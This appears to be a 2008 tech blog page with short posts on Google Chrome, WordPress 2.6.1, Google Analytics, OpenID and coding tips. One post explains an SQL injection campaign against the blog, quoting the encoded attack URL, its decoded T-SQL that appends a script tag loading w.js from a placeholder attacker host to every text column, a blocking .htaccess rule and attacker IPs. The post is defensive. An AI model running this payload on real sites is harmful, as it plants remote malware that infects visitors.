Society
Campaign all about technology

Crime
Jail the ‘greedy’ scam victims

Science
Large Hadron Collider (LHC) Runs Successful First Test Wednesday

Entertainment
Coming soon … Facebook: The Movie

Gadget
Fourth Generation of Apple iPod

No it’s actually call Google Chrom, one more product released to public from Google… This is a new browser built on the Webkit rendering-engine (same as Safari runs on) and the brand new V8 JS-engine.

Have a look at the Google Chrome comic here, an interesting way to introduce their browser and why you should really really really move away from Internet Explorer 6.

Related Reading

Google co-founder expects Chrome for Android
Does Google Have Rights to Everything You Send Through Chrome?
Serious Security Flaw in Google Chrome

From 11th August, I have received SQL injection attack to my blog on daily bases (each try is 2 consequent attempts). Apprently it has started since 8th of August and not too many blogger/webmasters have realised this. Here a non-technical summary of what’s going on.

What is it?

It is a SQL injection attacking from input URL string. Attacking will run following URL to your site:

;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41---TRUNCATED---43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Which is a hexed string, translated as:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="HACKERS_ADDRESS/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="HACKERS_ADDRESS/w.js"></script><!--''') FETCH NEXT FROM  Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

This script is trying to infect website by executing a query to attach a javascript file from the attacker’s site on to your website. When a browser reached the infected website, the injected javascript will be called and will attempt to download one of the following program onto browser’s computer:

• rondll32.exe
• msyahoo.exe
• wsv.exe
• thunder.exe

No details on what these malicious program does yet, but certainly not something you want. You can check on Internet Storm Center who provided a comprehensive detail on this activity and TrustedSource who also provide a non-technical description on this attack.

I’m a blogger/webmater, How can I prevent it?

The script is not CMS specified and as long as it have no access to your server, exploit attempt will fail on the spot. Thanks to tflight in WordPress forum, you can add following rewrite rules to your .htaccess file to filter out attacking attempts (just in case):

RewriteCond %{QUERY_STRING} ^(.+)declare(.+)$ [NC]
RewriteRule ^.* - [F,L]

If you log your site, now is a time to open it up and take a look see if you are been targeted. Those who own website(s) and do not pay much attention, now is a good time to rethink and look after your visitors.

I’m a browser, How can I prevent it?

The injected javascript detects your browser type to either create an activeX object (if you on IE) or opens a flash file, which both will download the malicious program on to your computer.

If you are using IE 6, for gods sack.. please upgrade to IE 7 or switch to Firefox.
If you are a IE 7 user, make sure your browser setting prevents to execute ActiveX automatically on any site and be suspicious when a random site attempts to run ActiveX.

The best solution I have for Internet browsers, is to use Firefox 3 with No-Script extension on it.

Here’s a list of IP of the foes who tried to attack my blog (so far):
24.253.101.241
60.221.229.53
61.185.148.148
61.18.170.115
61.18.170.227
82.46.210.74
87.206.38.42
190.40.69.44
218.74.194.61
221.207.153.239
220.163.186.17

Ban them at your will.

Google Analytics may seems straight forward to most webmasters, everyone use it and everyone would know what it is… right?

That’s not true and thanks to CSS-Tricks released a comprehensive tutorial  to Google Analytics in ’spoon-feed’ mode! (aka/ video screencast).

Link: http://css-tricks.com/videos/css-tricks-video-31.php

Video screencast is 17 minutes long and covers following topics:

• Introduction on Google Analytics
• Setup Google Analytics in a WordPress blog
• Talk on a possible cause of report poison
• Using filter on your Google Analytics report
• Setting up a Goal

Exactly 1 month after WordPress 2.6 was released, first bug fix released today fixing 61 none critical fixes. WordPress 2.6.1 is described as a maintenance release and WP bloggers do not require to upgrade if their don’t want to.

You may checkout the complete list of changed files and this time I won’t be bother doing a detail compare between 2 versions because WordPress trac is going to do it for me!

Database upgrade is easy this time, the only change is the wp_terms table, where the length of wp_terms.name is extended to varchar(200) from varchar(55) and is indexed.

To sum up, here are the related links:

WordPress Blog
http://wordpress.org/development/2008/08/wordpress-261/

Changes in WordPress 2.6.1
http://trac.wordpress.org/query…&order=priority

Diff on WordPress 2.6.1 to WordPress 2.6
http://trac.wordpress.org/changeset?…2F2.6.1&new=8652

Here’s a sneak peak of the 14 tips in the box from creative programmers to get you out of the box.

1. Learn a new language
2. Start from the ground up
3. Question everything
4. Do it for fun
5. Never stop testing ideas
6. Find a passion
7. Master your tools
8. Start making abstract associations
9. Think of structure as a tool, not a limitation
10. Don’t rule anything out until you try it.
11. Always look for a simpler and more elegant solution.
12. Don’t be afraid to build off the code of others.
13. Don’t be afraid to collaborate.
14. From the very basic, create the beautiful.

Article: Creative Code: 14 Ways to Learn From Creative Programmers

In as little as 2 days, Google’s privacy measurement is allow in question. Check out on following related articles:

Google takes a risky road with privacy
http://www.smh.com.au/…/08/06/1217702095425.html

Outcry dilutes Google’s all-seeing Street View plan
http://www.news.com.au/…/0,25642,24045971-5014108,00.html

Google exec has ‘no privacy’ on Street View
http://www.news.com.au/…/0,25642,24124504-5014108,00.html

Factors that improve online experiences
http://www.idea.org/find-information.html

Password : You’re doing it wrong
http://codebetter.com/blogs/karlseguin/archive/2008/07/30/password-you-re-doing-it-wrong.aspx

A Small Design Study Of Big Blogs - Part 1
http://www.smashingmagazine.com/2008/07/24/a-small-study-of-big-blogs/

A Small Design Study Of Big Blogs - Part2
http://www.smashingmagazine.com/2008/07/31/a-small-survey-of-big-blogs-further-findings/

I am surprised that most of my techie friends are still not aware of OpenID and its existence. So I decided to start up with a very brief introduction on OpenID, and will move on talking about some of its issues and how we can ultilise OpenID.

OpenID is a single digital identify that allow users to log on to different web sites without the need for different user name and password for each site. The idea of one identifier can potentially saves Web2.0, rescue web users from endless registration forms.

Web user only needs to register with any OpenID identity provider (IdP). Since OpenID is decentralized (unlike Facebook Connect), web users can choose to register from IdP such as:

• LiveJournal
• Personal Identity Provider
• MyOpenID

You can find a complete list of all IdPs from OpenID directory.

Up to today, there are over 600 websites that support OpenID. Blog webmasters are recommended to enable OpenID in their blog instead of forcing web user to register. Again, you can find complete list of web sites that support OpenID from OpenID directory.

Here’s a sneak peak on the big players who’s in the game:

• AOL
• BBC
• IBM
• Yahoo!

Related Articles:

How Not to use OpenID
http://kswenson.wordpress.com/…/how-not-to-use-openid/

How to turn your blog in to an OpenID
http://simonwillison.net/2006/Dec/19/openid/

Web 2.1: How OpenID will rescue Web 2.0
http://kswenson.wordpress.com/…how-openid-will-rescue-web-20/